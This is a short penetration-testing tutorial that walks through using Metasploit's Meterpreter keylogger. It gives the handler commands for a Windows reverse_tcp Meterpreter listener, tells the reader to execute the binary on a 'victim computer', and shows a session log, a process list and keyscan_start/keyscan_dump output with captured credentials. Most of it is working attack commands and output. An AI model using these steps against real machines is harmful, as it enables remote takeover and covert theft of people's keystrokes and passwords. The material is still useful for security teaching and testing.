Meterpreter Keylogger

Introduction

Gaining access to credentials is a vital phase in penetration testing, and Meterpreter offers numerous functionalities facilitating attackers in extracting sensitive information. One notable capability is its integrated keylogger, which captures and records keystrokes.

Step-by-Step Guide

1. Create the meterpreter binary

How-To: Creating a Meterpreter Binary

2. Create and run a listener

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <IP>
msf6 exploit(multi/handler) > set LPORT <PORT>
msf6 exploit(multi/handler) > exploit

3. Execute your meterpreter binary on the victim computer

4. Confirm connection

Sample (run ‘ps’):

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 172.28.99.163:9999
[*] Sending stage (175686 bytes) to 172.28.96.1
[*] Meterpreter session 1 opened (172.28.99.163:9999 -> 172.28.96.1:11322) at 2024-01-24 11:14:18 +1100

meterpreter > ps

Process List
============

 PID   PPID  Name         Arch  Session  User                Path
 ---   ----  ----         ----  -------  ----                ----
 0     0     [System Pro
             cess]
 4     0     System
 224   4     smss.exe
 296   288   csrss.exe
 308   432   svchost.exe
 344   288   wininit.exe
 356   336   csrss.exe
 396   336   winlogon.exe
 432   344   services.exe
 440   344   lsass.exe
 ...

5. Run keylogger module

meterpreter > keyscan_start
Starting the keystroke sniffer ...

5. Dump the captured keystrokes

meterpreter > keyscan_dump
Dumping captured keystrokes...
win7<Tab>12345<Tab>12345

Video Demonstration

Reference

https://www.offsec.com/metasploit-unleashed/keylogging/#using-a-keylogger-with-metasploit